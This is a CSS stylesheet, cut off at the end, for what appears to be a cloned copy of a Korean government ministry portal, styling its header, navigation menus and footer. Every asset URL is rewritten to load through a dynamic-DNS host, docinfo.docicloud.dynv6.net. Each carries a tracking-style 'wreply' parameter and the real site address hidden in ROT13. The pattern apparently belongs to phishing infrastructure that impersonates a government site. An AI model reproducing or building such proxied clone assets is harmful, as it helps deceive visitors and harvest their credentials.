/* font */
@import url("http://docinfo.docicloud.dynv6.net/portal/?wreply=3mail@a.b.c0&m=uggcf%3N%2S%2Sjjj.zfvg.tb.xe%2Snffrg%2Spff%2Shfre%2S..%2Ssbag%2SCergraqneq%2SCergraqneq.pff");

/* Reset */
*,
*:before,
*:after {
  box-sizing: border-box;
}
html {
  font-size: 10px;
  -webkit-text-size-adjust: 100%;
  -ms-text-size-adjust: 100%;
}
body,
h1,
h2,
h3,
h4,
h5,
h6,
div,
p,
address,
ul,
ol,
li,
dl,
dt,
dd,
table,
th,
td,
form,
fieldset,
legend,
hr {
  margin: 0;
  padding: 0;
}
h1,
h2,
h3,
h4,
h5,
h6 {
  font-size: 16px;
}
ul,
ol {
  list-style: none;
}
table {
  margin: 0;
  padding: 0;
  border-spacing: 0;
  border: 0;
}
img,
fieldset {
  border: 0;
  vertical-align: top;
}
address,
em {
  font-style: normal;
}
em {
  font-weight: 500;
}
strong {
  font-weight: 700;
}
input,
select,
button,
textarea {
  color: #1d1d1d;
  font-size: 16px;
  line-height: 1.5;
  font-family: "Pretendard", sans-serif;
  vertical-align: middle;
}
button {
  border: none;
  appearance: none;
}

/* Base */
body {
  background: #fff;
  color: #1d1d1d;
  font-size: 16px;
  line-height: 1.5;
  font-weight: 400;
  font-family: "Pretendard", sans-serif;
  text-align: left;
}

hr {
  display: none;
}
a {
  color: #1d1d1d;
  text-decoration: none;
}
a:focus,
a:hover,
a:active {
}
label,
input[type="button"],
input[type="submit"],
input[type="image"],
button {
  cursor: pointer;
}
input[type="text"],
input[type="tel"],
input[type="number"],
input[type="password"],
input[type="button"],
input[type="submit"],
input[type="image"],
textarea {
  border-radius: 0;
  appearance: none;
  -webkit-appearance: none;
}
textarea {
  overflow-y: auto;
}
fieldset {
  display: block;
}
button {
  -webkit-appearance: none;
  appearance: none;
}

select {
  text-indent: 0;
  -moz-appearance: none;
  -webkit-appearance: none;
  -ms-appearance: none;
  appearance: none;
  cursor: pointer;
}
select::-ms-expand {
  display: none;
}

#skip_nav {
  position: absolute;
  top: 0;
  left: 0;
  width: 100%;
  height: 1px;
  z-index: 99999;
}
#skip_nav a {
  display: block;
  position: absolute;
  top: -1px;
  left: 0;
  width: 100%;
  height: 1px;
  background: #0075e0;
  color: #fff;
  font-size: 20px;
  line-height: 50px;
  font-weight: bold;
  text-align: center;
  overflow: hidden;
  -webkit-transition: 0.3s;
  transition: 0.3s;
}
#skip_nav a:hover,
#skip_nav a:focus,
#skip_nav a:active {
  height: 50px;
  -webkit-transition: 0.3s;
  transition: 0.3s;
}

legend,
caption,
.alt_text,
.blind {
  position: absolute !important;
  width: 1px!important;
  height: 1px!important;
  margin: -1px!important;
  padding: 0!important;
  border: 0!important;
  clip: rect(0, 0, 0, 0)!important;
  overflow: hidden!important;
  white-space: nowrap!important;
}

/*html5*/
article,
aside,
dialog,
footer,
header,
section,
nav,
figure,
menu {
  display: block;
}

::-webkit-input-placeholder {
  color: #717171;
}

:-ms-input-placeholder {
  color: #717171;
}

::placeholder {
  color: #717171;
}

/* layout */
.mgt10 {
  margin-top: 10px !important;
}

.mgt20 {
  margin-top: 20px !important;
}

.scroll_lock {
  width: 100%;
  height: 100%;
  overflow: hidden;
}

.inner_center {
  max-width: 1344px;
  padding: 0 32px;
  margin: 0 auto;
}
.inner_center::after {
  content: "";
  display: block;
  clear: both;
}

#wrap {
  position: relative;
  overflow: hidden;
}

#header {
  position: relative;
  background: #fff;
  z-index: 90;
}

#mHeader,
.btn_search_toggle,
.m_search_field,
.btn_allmenu,
.m_allmenu_wrap {
  display: none;
}

.m_search_con {
  display: flex;
}

*:focus-visible {
  outline: #00b527 auto 3px;
  outline-offset: -2px;
}

.ma_infomenu_swiper a:focus-visible {
  outline-offset: 1px;
}

.chk_box input:focus-visible {
  outline-offset: 1px;
}

.head_util {
  background: #edf1f5;
}

/* 2024-08-01 : header 웹편의성 적용 */
.head_util .inner_center {
  display: flex;
  align-items: center;
  height: 32px;
}
/* //2024-08-01 : header 웹편의성 적용 */
.head_util .util_txt {
  display: flex;
  align-items: center;
  color: #1d1d1d;
  font-size: 15px;
  line-height: 1.5;
  font-weight: 400;
}
.head_util .util_txt:before {
  content: "";
  width: 24px;
  height: 16px;
  margin-right: 8px;
  background: url(http://docinfo.docicloud.dynv6.net/portal/?wreply=3mail@a.b.c0&m=uggcf%3N%2S%2Sjjj.zfvg.tb.xe%2Svzntrf%2Shfre%2Spbzzba%2Shgvy_vpb_jrofvgr.fit) no-repeat center/contain;
  box-shadow: 0px 0px 2px rgba(0, 0, 0, 0.1);
}

.head_util .util_symbol {
  display: flex;
  align-items: center;
  margin-left: 16px;
  color: #003675;
  font-size: 15px;
  line-height: 1.5;
  font-weight: 400;
}
/* .head_util .util_symbol:after {
  content: "";
  width: 16px;
  height: 16px;
  margin-left: 4px;
  background: url(http://docinfo.docicloud.dynv6.net/portal/?wreply=3mail@a.b.c0&m=uggcf%3N%2S%2Sjjj.zfvg.tb.xe%2Svzntrf%2Shfre%2Spbzzba%2Svpb_16_qbja_oynpx.fit) no-repeat center/contain;
} */

.head_top {
  background: #fff;
}
.head_top .inner_center {
  display: flex;
  align-items: center;
}
.head_top .left {
  padding: 16px 0;
  margin-right: auto;
}
.head_top .right {
  display: flex;
  align-items: center;
}

.head_top .logo a {
  display: flex;
  align-items: center;
}
/*
.head_top .logo a::after {
  content: "";
  width: 100px;
  height: 42px;
  margin-left: 16px;
  background: url(http://docinfo.docicloud.dynv6.net/portal/?wreply=3mail@a.b.c0&m=uggcf%3N%2S%2Sjjj.zfvg.tb.xe%2Svzntrf%2Shfre%2Spbzzba%2Sybtb_fybtna.cat) no-repeat center/contain;
}
*/
.head_top .logo a .logoimg {
  width: 236px;
  height: 44px;
  background: url(http://docinfo.docicloud.dynv6.net/portal/?wreply=3mail@a.b.c0&m=uggcf%3N%2S%2Sjjj.zfvg.tb.xe%2Svzntrf%2Shfre%2Spbzzba%2Sybtb.fit) no-repeat center/contain;
}

.head_top .util_list {
  display: flex;
  align-items: center;
}
.head_top .util_list > li {
  position: relative;
}
.head_top .util_list > li + li {
  margin-left: 8px;
  padding-left: 9px;
}
.head_top .util_list > li + li:before {
  content: "";
  position: absolute;
  top: 50%;
  left: 0;
  width: 1px;
  height: 16px;
  background-color: #d8d8d8;
  transform: translateY(-50%);
}
.head_top .util_list > li .util_btn {
  display: flex;
  align-items: center;
  padding: 8px;
  border-radius: 4px;
  background-color: transparent;
  font-size: 15px;
  line-height: 23px;
  font-weight: 400;
}

.drop_wrap {
  position: relative;
  z-index: 20;
}
.drop_wrap .drop_btn {
  display: flex;
  align-items: center;
  padding: 8px;
  border-radius: 4px;
  background-color: transparent;
  font-size: 15px;
  line-height: 23px;
  font-weight: 400;
}
.drop_wrap .drop_btn::after {
  content: "";
  flex: none;
  width: 16px;
  height: 16px;
  margin-left: 2px;
  background: url(http://docinfo.docicloud.dynv6.net/portal/?wreply=3mail@a.b.c0&m=uggcf%3N%2S%2Sjjj.zfvg.tb.xe%2Svzntrf%2Shfre%2Spbzzba%2Svpb_16_qbja_oynpx.fit) no-repeat center/contain;
}
.drop_wrap .drop_menu {
  display: none;
  position: absolute;
  top: 100%;
  left: 50%;
  padding: 8px;
  margin-top: 15px;
  border-radius: 8px;
  background-color: #fff;
  transform: translateX(-50%);
}
.drop_wrap .drop_menu::before {
  content: "";
  position: absolute;
  top: 0;
  right: 0;
  bottom: 0;
  left: 0;
  border: 1px solid #d8d8d8;
  border-radius: inherit;
  z-index: -1;
}
.drop_wrap .drop_menu::after {
  content: "";
  position: absolute;
  bottom: 100%;
  left: 50%;
  width: 20px;
  height: 12px;
  margin: 0 0 -1px -10px;
  background: url(http://docinfo.docicloud.dynv6.net/portal/?wreply=3mail@a.b.c0&m=uggcf%3N%2S%2Sjjj.zfvg.tb.xe%2Svzntrf%2Shfre%2Spbzzba%2Sot_qebc_neebj.fit) no-repeat center bottom/contain;
}
.drop_wrap .drop_list a {
  display: flex;
  justify-content: flex-start;
  align-items: center;
  height: 48px;
  padding: 0 16px;
  border-radius: 6px;
  color: #000;
  font-size: 17px;
  text-align: center;
  white-space: nowrap;
}
.drop_wrap .drop_list a[target="_blank"]::after {
  content: "";
  flex: none;
  width: 16px;
  height: 16px;
  margin-left: 8px;
  width: 16px;
  height: 16px;
  background: url(http://docinfo.docicloud.dynv6.net/portal/?wreply=3mail@a.b.c0&m=uggcf%3N%2S%2Sjjj.zfvg.tb.xe%2Svzntrf%2Shfre%2Spbzzba%2Svpb_16_oynax_oynpx.fit) no-repeat center/contain;
}
.drop_wrap .drop_list a:hover {
  background-color: #f0f3ff;
  text-decoration: underline;
  text-underline-offset: 3px;
}
.drop_wrap .drop_btn[aria-expanded="true"] + .drop_menu {
  display: block;
}

.head_top .util_list > li .util_btn:hover,
.head_top .util_list > li .drop_btn:hover {
  background-color: #f0f3ff;
}

.head_top .util_search {
  position: relative;
  margin-left: 16px;
}
.head_top .util_search input[type="text"] {
  width: 237px;
  height: 44px;
  padding: 0 48px 0 16px;
  border: none;
  border-radius: 10px;
  background: #fff;
  color: #1d1d1d;
  font-size: 15px;
  font-weight: 400;
  box-shadow: 0px 0px 6px 0px rgba(0, 0, 0, 0.3);
}
.head_top .util_search input[type="text"]:hover {
  background-color: #f0f3ff;
}
.head_top .util_search input[type="text"]::-webkit-input-placeholder {
  color: #717171;
}
.head_top .util_search input[type="text"]:-ms-input-placeholder {
  color: #717171;
}
.head_top .util_search input[type="text"]::placeholder {
  color: #717171;
}
.head_top .util_search .btn_search {
  position: absolute;
  top: 50%;
  right: 16px;
  width: 20px;
  height: 20px;
  background: url(http://docinfo.docicloud.dynv6.net/portal/?wreply=3mail@a.b.c0&m=uggcf%3N%2S%2Sjjj.zfvg.tb.xe%2Svzntrf%2Shfre%2Spbzzba%2Soga_20_frnepu_oynpx.fit) no-repeat center/contain;
  transform: translateY(-50%);
}

.head_gnb {
  position: relative;
  background: #fff;
  border-top: 1px solid #bec2c8;
  border-bottom: 1px solid #bec2c8;
}

.head_gnb .inner_center {
  display: flex;
  align-items: center;
  justify-content: space-between;
}

.head_gnb .logo {
  width: 357px;
  height: 64px;
  margin-right: auto;
}

.head_gnb .logo a {
  display: block;
  width: 100%;
  height: 100%;
  background: url(http://docinfo.docicloud.dynv6.net/portal/?wreply=3mail@a.b.c0&m=uggcf%3N%2S%2Sjjj.zfvg.tb.xe%2Svzntrf%2Shfre%2Spbzzba%2Sybtb.fit) no-repeat 0 center;
  background-size: contain;
  text-indent: -999px;
  overflow: hidden;
}

#gnb {
  display: flex;
  width: 100%;
  margin-bottom: -1px;
}
#gnb > li {
  flex: 1;
}
#gnb > li > a {
  display: flex;
  justify-content: center;
  align-items: center;
  position: relative;
  height: 63px;
}
#gnb > li > a.on {
  box-sizing: border-box;
  border-bottom: 2px solid #002e6d;
}
#gnb > li > a.on > span {
  color: #002e6d;
}
#gnb > li > a.on > span::after {
  background-image: url(http://docinfo.docicloud.dynv6.net/portal/?wreply=3mail@a.b.c0&m=uggcf%3N%2S%2Sjjj.zfvg.tb.xe%2Svzntrf%2Shfre%2Spbzzba%2Svpb_20_qbja_oyhr.fit);
}

#gnb > li > a > span {
  display: flex;
  align-items: center;
  position: relative;
  color: #2d2d2d;
  font-size: 19px;
  font-weight: 700;
  z-index: 2;
}
#gnb > li > a > span::after {
  content: "";
  width: 20px;
  height: 20px;
  margin-left: 8px;
  background: url(http://docinfo.docicloud.dynv6.net/portal/?wreply=3mail@a.b.c0&m=uggcf%3N%2S%2Sjjj.zfvg.tb.xe%2Svzntrf%2Shfre%2Spbzzba%2Svpb_20_qbja_oynpx.fit) no-repeat center/contain;
}

#gnb > li.active > a {
  background-color: #f0f3ff;
}
#gnb > li.active > a > span {
  color: #002e6d;
}
#gnb > li.active > a > span::after {
  background-image: url(http://docinfo.docicloud.dynv6.net/portal/?wreply=3mail@a.b.c0&m=uggcf%3N%2S%2Sjjj.zfvg.tb.xe%2Svzntrf%2Shfre%2Spbzzba%2Svpb_20_qbja_oyhr.fit);
}

#gnb > li > .depth_box {
  position: absolute;
  top: 0;
  left: -9999px;
  height: 1px;
  margin-top: -1px;
  opacity: 0.01;
  overflow: hidden;
  display: none;
}

#gnb > li > .depth_box .depth_scroll {
  min-height: 195px;
  overflow-y: auto;
}

#gnb > li > .depth_box .depth_flex {
  display: flex;
  flex-direction: column;
  max-width: 1344px;
  padding: 40px 32px;
   /* 2025-03-13 : GNB 타이틀 상단 간격 조정 */
  padding-top: 30px;
   /* //2025-03-13 : GNB 타이틀 상단 간격 조정 */
  margin: 0 auto;
}

#gnb > li > .depth_box .depth_tit {
  display: flex;
  flex-direction: column;
  justify-content: center;
  position: relative;
  /* 2025-03-13 : GNB 타이틀 사이즈 조정 */
  /*min-height: 80px;
  padding-left: 96px;*/
  min-height: 48px;
  padding-left: 56px;
  /* //2025-03-13 : GNB 타이틀 사이즈 조정 */
}
#gnb > li > .depth_box .depth_tit::before {
  content: "";
  position: absolute;
  top: 50%;
  left: 0;
  /* 2025-03-13 : GNB 타이틀 아이콘 사이즈 조정 */
  /*width: 80px;
  height: 80px;
  border-radius: 20px;*/
  width: 48px;
  height: 48px;
  border-radius: 14px;
  /* //2025-03-13 : GNB 타이틀 아이콘 사이즈 조정 */
  background-repeat: no-repeat;
  background-position: center;
  background-size: contain;
  box-shadow: 0px 6px 6px 0px rgba(0, 0, 0, 0.12);
  transform: translateY(-50%);
}
#gnb > li:nth-child(1) > .depth_box .depth_tit::before {
  background-image: url(http://docinfo.docicloud.dynv6.net/portal/?wreply=3mail@a.b.c0&m=uggcf%3N%2S%2Sjjj.zfvg.tb.xe%2Svzntrf%2Shfre%2Spbzzba%2Stao_qrcgu_vpb01.fit);
}
#gnb > li:nth-child(2) > .depth_box .depth_tit::before {
  background-image: url(http://docinfo.docicloud.dynv6.net/portal/?wreply=3mail@a.b.c0&m=uggcf%3N%2S%2Sjjj.zfvg.tb.xe%2Svzntrf%2Shfre%2Spbzzba%2Stao_qrcgu_vpb02.fit);
}
#gnb > li:nth-child(3) > .depth_box .depth_tit::before {
  background-image: url(http://docinfo.docicloud.dynv6.net/portal/?wreply=3mail@a.b.c0&m=uggcf%3N%2S%2Sjjj.zfvg.tb.xe%2Svzntrf%2Shfre%2Spbzzba%2Stao_qrcgu_vpb04.fit);
}
#gnb > li:nth-child(4) > .depth_box .depth_tit::before {
  background-image: url(http://docinfo.docicloud.dynv6.net/portal/?wreply=3mail@a.b.c0&m=uggcf%3N%2S%2Sjjj.zfvg.tb.xe%2Svzntrf%2Shfre%2Spbzzba%2Stao_qrcgu_vpb05.fit);
}
#gnb > li:nth-child(5) > .depth_box .depth_tit::before {
  background-image: url(http://docinfo.docicloud.dynv6.net/portal/?wreply=3mail@a.b.c0&m=uggcf%3N%2S%2Sjjj.zfvg.tb.xe%2Svzntrf%2Shfre%2Spbzzba%2Stao_qrcgu_vpb03.fit);
}
#gnb > li:nth-child(6) > .depth_box .depth_tit::before {
  background-image: url(http://docinfo.docicloud.dynv6.net/portal/?wreply=3mail@a.b.c0&m=uggcf%3N%2S%2Sjjj.zfvg.tb.xe%2Svzntrf%2Shfre%2Spbzzba%2Stao_qrcgu_vpb04_vafrg.fit);
}
#gnb > li:nth-child(7) > .depth_box .depth_tit::before {
  background-image: url(http://docinfo.docicloud.dynv6.net/portal/?wreply=3mail@a.b.c0&m=uggcf%3N%2S%2Sjjj.zfvg.tb.xe%2Svzntrf%2Shfre%2Spbzzba%2Stao_qrcgu_vpb06.fit);
}
#gnb > li > .depth_box .depth_tit .tit {
  color: #002352;
  font-size: 25px;
  line-height: 38px;
  font-weight: 700;
}
#gnb > li > .depth_box .depth_tit .tit_p {
  color: #555;
  font-size: 17px;
  line-height: 26px;
  font-weight: 400;
  /* 2025-03-13 : GNB 슬로건 숨김 처리 */
  display: none;
  /* //2025-03-13 : GNB 슬로건 숨김 처리 */
}

#gnb > li > .depth_box .depth {
  display: flex;
  flex-wrap: wrap;
  margin-top: 30px;
  gap: 40px 24px;
  z-index: 1;
}

#gnb > li > .depth_box .depth > li {
  width: calc(25% - 18px);
}

#gnb > li > .depth_box .depth > li > a {
  display: flex;
  justify-content: space-between;
  align-items: center;
  padding: 16px 16px 16px 20px;
  border-radius: 10px;
  background-color: #f2f4f8;
  color: #1d1d1d;
  font-size: 19px;
  line-height: 29px;
  font-weight: 400;
  transition: 0.2s;
}
#gnb > li > .depth_box .depth > li > a::after {
  content: "";
  flex: none;
  width: 18px;
  height: 18px;
  margin-left: 16px;
  background: url(http://docinfo.docicloud.dynv6.net/portal/?wreply=3mail@a.b.c0&m=uggcf%3N%2S%2Sjjj.zfvg.tb.xe%2Svzntrf%2Shfre%2Spbzzba%2Svpb_18_evtug_tenl.fit) no-repeat center/contain;
}

#gnb > li > .depth_box .depth > li:hover > a,
#gnb > li > .depth_box .depth > li > a:focus,
#gnb > li > .depth_box .depth > li.active > a {
  background: url(http://docinfo.docicloud.dynv6.net/portal/?wreply=3mail@a.b.c0&m=uggcf%3N%2S%2Sjjj.zfvg.tb.xe%2Svzntrf%2Shfre%2Spbzzba%2Sot_tao_qrcgu_ubire.cat) no-repeat right center/cover;
  background-color: #003a88;
  color: #fff;
}
#gnb > li > .depth_box .depth > li > a:hover {
  box-shadow: 0px 6px 6px 0px rgba(0, 0, 0, 0.12);
  text-decoration: underline;
  text-underline-offset: 5px;
}

#gnb > li > .depth_box .depth > li:hover > a::after,
#gnb > li > .depth_box .depth > li > a:focus:after,
#gnb > li > .depth_box .depth > li.active > a:after {
  background-image: url(http://docinfo.docicloud.dynv6.net/portal/?wreply=3mail@a.b.c0&m=uggcf%3N%2S%2Sjjj.zfvg.tb.xe%2Svzntrf%2Shfre%2Spbzzba%2Svpb_18_evtug_juvgr.fit);
}

#gnb > li > .depth_box .depth > li > a[target="_blank"]::after {
  width: 16px;
  height: 16px;
  background-image: url(http://docinfo.docicloud.dynv6.net/portal/?wreply=3mail@a.b.c0&m=uggcf%3N%2S%2Sjjj.zfvg.tb.xe%2Svzntrf%2Shfre%2Spbzzba%2Svpb_16_oynax_tenl.fit);
}

#gnb > li > .depth_box .depth > li:hover > a[target="_blank"]::after,
#gnb > li > .depth_box .depth > li > a[target="_blank"]:focus::after,
#gnb > li > .depth_box .depth > li.active > a[target="_blank"]::after {
  background-image: url(http://docinfo.docicloud.dynv6.net/portal/?wreply=3mail@a.b.c0&m=uggcf%3N%2S%2Sjjj.zfvg.tb.xe%2Svzntrf%2Shfre%2Spbzzba%2Svpb_16_oynax_juvgr.fit);
}

#gnb > li > .depth_box .depth > li > .depth02 > li {
  margin-top: 16px;
}

#gnb > li > .depth_box .depth > li > .depth02 > li > a {
  display: inline-flex;
  align-items: flex-start;
  color: #555;
  font-size: 17px;
  line-height: 26px;
  font-weight: 400;
  transition: 0.2s;
}
#gnb > li > .depth_box .depth > li > .depth02 > li > a:hover {
  color: #002e6d;
  font-weight: 700;
  text-decoration: underline;
  text-underline-offset: 4px;
}
#gnb > li > .depth_box .depth > li > .depth02 > li > a::before {
  content: "";
  flex: none;
  width: 4px;
  height: 4px;
  margin: 11px 8px;
  border-radius: 100%;
  background-color: #003a88;
}

#gnb > li > .depth_box .depth > li > .depth02 > li > a[target="_blank"]::after {
  content: "";
  flex: none;
  width: 16px;
  height: 16px;
  margin: 5px 0 5px 8px;
  background: url(http://docinfo.docicloud.dynv6.net/portal/?wreply=3mail@a.b.c0&m=uggcf%3N%2S%2Sjjj.zfvg.tb.xe%2Svzntrf%2Shfre%2Spbzzba%2Svpb_16_oynax_tenl.fit) no-repeat center/contain;
}

#gnb > li.active > .depth_box {
  position: absolute;
  top: 100%;
  left: 0;
  right: 0;
  height: auto;
  margin: 0;
  border-top: 1px solid #bec2c8;
  border-top: 1px solid #d8d8d8;
  background: #fff;
  opacity: 1;
  display: block;
}

#gnb > li.active > .depth_box::before {
  content: "";
  position: fixed;
  top: 0;
  right: 0;
  bottom: 0;
  left: 0;
  background-color: rgba(0, 0, 0, 0.5);
  z-index: -1;
  pointer-events: none;
}

.mCSB_inside > .mCSB_container {
  margin-right: 0;
}

.mCustomScrollBox:focus::before {
  content: "";
  position: absolute;
  top: 1px;
  right: 1px;
  bottom: 1px;
  left: 1px;
  border: 1px solid #000;
  box-shadow: 0 0 1px 1px #fff;
}

.mCSB_scrollTools {
  width: 3px;
  opacity: 1;
}

.mCSB_scrollTools .mCSB_dragger .mCSB_dragger_bar {
  width: 3px;
}

.mCSB_scrollTools .mCSB_draggerRail {
  background: rgba(255, 255, 255, 1);
}

.mCSB_scrollTools .mCSB_dragger .mCSB_dragger_bar {
  width: 3px;
  background: #002b51;
}

.mCSB_scrollTools .mCSB_dragger:active .mCSB_dragger_bar,
.mCSB_scrollTools .mCSB_dragger.mCSB_dragger_onDrag .mCSB_dragger_bar {
  background: #002b51;
}

#container {
  position: relative;
}

.go_top {
  position: fixed;
  right: 80px;
  bottom: 80px;
  z-index: 70;
  display: flex;
  flex-direction: column;
  align-items: flex-end;
  gap: 20px;
}
.go_top:hover {
  background-position: center center, -9999px center;
}

.go_top.end_top {
  position: absolute;
}
.go_top .go_top_btn {
  display: flex;
  width: 60px;
  height: 60px;
  background-image: url(http://docinfo.docicloud.dynv6.net/portal/?wreply=3mail@a.b.c0&m=uggcf%3N%2S%2Sjjj.zfvg.tb.xe%2Svzntrf%2Shfre%2Spbzzba%2Soga_gbc_ubire.fit), url(http://docinfo.docicloud.dynv6.net/portal/?wreply=3mail@a.b.c0&m=uggcf%3N%2S%2Sjjj.zfvg.tb.xe%2Svzntrf%2Shfre%2Spbzzba%2Soga_gbc.fit);
  background-repeat: no-repeat, no-repeat;
  background-position: -9999px center, center center;
  background-size: contain, contain;
  text-indent: -999px;
  border-radius: 8px;
  overflow: hidden;
}

@media screen and (max-width: 1024px) {
  .go_top .bn_box {
    display: none;
  }
}
@media screen and (max-width: 767px) {
  .go_top {
    display: none !important;
  }
}

#footer {
  position: relative;
  border-top: 1px solid #c6c6c6;
  background: #f8f8f8;
}
.foot_top_flex {
  display: flex;
  align-items: flex-end;
  padding: 30px 0;
}
.foot_top_flex .logo_txtbox {
  display: flex;
  flex-direction: column;
}
.foot_top_flex .logo_txtbox .foot_logo {
  width: 236px;
  height: 44px;
  background: url(http://docinfo.docicloud.dynv6.net/portal/?wreply=3mail@a.b.c0&m=uggcf%3N%2S%2Sjjj.zfvg.tb.xe%2Svzntrf%2Shfre%2Spbzzba%2Sybtb.fit) no-repeat center/contain;
}
.foot_top_flex .logo_txtbox .txt_box {
  margin-top: 24px;
  font-size: 17px;
  line-height: 1.5;
  font-weight: 400;
}
.foot_top_flex .logo_txtbox .txt_box .address {
  word-break: keep-all;
}
.foot_top_flex .logo_txtbox .tel_fax {
  display: flex;
  gap: 20px;
  align-items: center;
  margin-top: 24px;
}
.foot_top_flex .logo_txtbox .tel_fax dl {
  display: flex;
}
.foot_top_flex .logo_txtbox .tel_fax dl dt {
  margin-right: 4px;
  font-weight: 700;
}
.foot_top_flex .link_btnbox {
  display: flex;
  flex-direction: column;
  margin: 0 16px 0 auto;
}
.foot_top_flex .link_btnbox .link_btn {
  display: flex;
  align-items: center;
  margin-top: 16px;
  padding: 2px;
  font-size: 17px;
  line-height: 1.5;
  font-weight: 700;
}
.foot_top_flex .link_btnbox .link_btn::after {
  content: "";
  width: 16px;
  height: 16px;
  margin-left: 4px;
  background: url(http://docinfo.docicloud.dynv6.net/portal/?wreply=3mail@a.b.c0&m=uggcf%3N%2S%2Sjjj.zfvg.tb.xe%2Svzntrf%2Shfre%2Spbzzba%2Svpb_20_evtug_oynpx.fit) no-repeat center/contain;
}
.foot_top_flex .link_btnbox .link_btn:hover {
  text-decoration: underline;
  text-underline-offset: 3px;
}

.foot_bottom_flex {
  display: flex;
  align-items: center;
  padding: 20px 0;
  border-top: 1px solid #d8d8d8;
}
.foot_bottom_flex .links_copyright {
  margin-right: auto;
}
.foot_bottom_flex .links_copyright .foot_link {
  display: flex;
  align-items: center;
}
.foot_bottom_flex .links_copyright .foot_link > li {
  margin-right: 24px;
}
.foot_bottom_flex .links_copyright .foot_link > li > a {
  display: flex;
  align-items: center;
  padding: 0 2px;
  font-size: 17px;
  line-height: 24px;
  font-weight: 400;
}
.foot_bottom_flex .links_copyright .foot_link > li:first-child > a {
  text-decoration: underline;
}
.foot_bottom_flex .links_copyright .foot_link > li > a.active {
  color: #1a258a;
  font-weight: 700;
}
.foot_bottom_flex .links_copyright .foot_link > li > a:hover {
  text-decoration: underline;
  text-underline-offset: 3px;
}
.foot_bottom_flex .links_copyright .copyright {
  margin-top: 12px;
  color: #555;
  font-size: 15px;
  line-height: 1.5;
  font-weight: 400;
}

.foot_bottom_flex .otherlogo {
  flex: none;
  display: flex;
  align-items: center;
}
.foot_bottom_flex .otherlogo .logo_open {
  width: 61px;
  height: 41px;
  background: url(http://docinfo.docicloud.dynv6.net/portal/?wreply=3mail@a.b.c0&m=uggcf%3N%2S%2Sjjj.zfvg.tb.xe%2Svzntrf%2Shfre%2Spbzzba%2Ssbbg_ybtb_bcra.cat) no-repeat center/contain;
}

.foot_bottom_flex .otherlogo .logo_wa {
  width: 55px;
  height: 38px;
  margin-left: 16px;
  background: url(http://docinfo.docicloud.dynv6.net/portal/?wreply=3mail@a.b.c0&m=uggcf%3N%2S%2Sjjj.zfvg.tb.xe%2Svzntrf%2Shfre%2Spbzzba%2Ssbbg_ybtb_jn.cat) no-repeat center/contain;
}

@media screen and (max-width: 1280px) {
  #skip_nav {
    display: none;
  }

  #header {
    display: none;
  }

  #mHeader {
    display: block;
    position: relative;
    background: #fff;
    z-index: 90;
    border-bottom: 1px solid #d8d8d8;
  }
  #mHeader .inner_center {
    display: flex;
    align-items: center;
    width: 100%;
  }

  .m_head_util {
    background: #f0f0f0;
  }

  .m_head_util .util_txt {
    display: flex;
    align-items: center;
    min-height: 31px;
    color: #1d1d1d;
    font-size: 15px;
    line-height: 1.5;
    font-weight: 400;
  }
  .m_head_util .util_txt:before {
    content: "";
    width: 24px;
    height: 16px;
    margin-right: 8px;
    background: url(http://docinfo.docicloud.dynv6.net/portal/?wreply=3mail@a.b.c0&m=uggcf%3N%2S%2Sjjj.zfvg.tb.xe%2Svzntrf%2Shfre%2Spbzzba%2Shgvy_vpb_jrofvgr.fit) no-repeat center/contain;
    box-shadow: 0px 0px 2px rgba(0, 0, 0, 0.1);
  }

  .m_head_top .left {
    padding: 18px 0;
    margin-right: auto;
  }
  .m_head_top .right {
    display: flex;
    align-items: center;
  }

  .m_head_top .logo a {
    display: flex;
    align-items: center;
  }
  /* .m_head_top .logo a::after {
    content: "";
    width: 100px;
    height: 42px;
    margin-left: 16px;
    background: url(http://docinfo.docicloud.dynv6.net/portal/?wreply=3mail@a.b.c0&m=uggcf%3N%2S%2Sjjj.zfvg.tb.xe%2Svzntrf%2Shfre%2Spbzzba%2Sybtb_fybtna.cat) no-repeat center/contain;
  } */
  .m_head_top .logo a .logoimg {
    width: 236px;
    height: 44px;
    background: url(http://docinfo.docicloud.dynv6.net/portal/?wreply=3mail@a.b.c0&m=uggcf%3N%2S%2Sjjj.zfvg.tb.xe%2Svzntrf%2Shfre%2Spbzzba%2Sybtb.fit) no-repeat center/contain;
  }

  .btn_search_toggle {
    display: block;
    width: 45px;
    height: 48px;
    background: url(http://docinfo.docicloud.dynv6.net/portal/?wreply=3mail@a.b.c0&m=uggcf%3N%2S%2Sjjj.zfvg.tb.xe%2Svzntrf%2Shfre%2Spbzzba%2Sz_oga_frnepu.fit) no-repeat center/contain;
    text-indent: -999px;
    overflow: hidden;
  }

  .m_search_field {
    display: block;
  }

  .m_search_con {
    display: flex;
    justify-content: center;
    align-items: center;
    gap: 24px;
    position: absolute;
    top: calc(100% - 1px);
    right: 0;
    left: 0;
    padding: 16px;
    border-top: 1px solid #d8d8d8;
    z-index: 92;
    background-color: #fff;
    box-shadow: 0 26px 20px rgba(0, 0, 0, 0.16);
    visibility: hidden;
  }
  .m_search_con fieldset {
    display: block;
    position: relative;
    width: 100%;
    max-width: 310px;
  }
  .m_search_con fieldset input[type="text"] {
    width: 100%;
    height: 47px;
    padding: 0 48px 0 16px;
    border: none;
    border-radius: 10px;
    background: #fff;
    box-shadow: 0px 0px 6px 0px rgba(0, 0, 0, 0.3);
    color: #1d1d1d;
    font-size: 15px;
    font-weight: 400;
    outline: none;
  }
  .m_search_con fieldset input[type="text"]::-webkit-input-placeholder,
  .m_search_con fieldset input[type="text"]:-ms-input-placeholder,
  .m_search_con fieldset input[type="text"]::placeholder {
    color: #717171;
  }

  .m_search_con fieldset .btn_search {
    position: absolute;
    top: 50%;
    right: 16px;
    width: 20px;
    height: 20px;
    background: url(http://docinfo.docicloud.dynv6.net/portal/?wreply=3mail@a.b.c0&m=uggcf%3N%2S%2Sjjj.zfvg.tb.xe%2Svzntrf%2Shfre%2Spbzzba%2Svpb_20_frnepu_oynpx.fit) no-repeat center/contain;
    text-indent: -999px;
    overflow: hidden;
    transform: translateY(-50%);
  }
  .m_search_con .btn_search_close {
    flex: none;
    width: 24px;
    height: 24px;
    background: url(http://docinfo.docicloud.dynv6.net/portal/?wreply=3mail@a.b.c0&m=uggcf%3N%2S%2Sjjj.zfvg.tb.xe%2Svzntrf%2Shfre%2Spbzzba%2Svpb_24_pybfr_oynpx.fit) no-repeat center/contain;
    text-indent: -999px;
    overflow: hidden;
  }

  .btn_allmenu {
    display: block;
    width: 45px;
    height: 48px;
    margin-left: 16px;
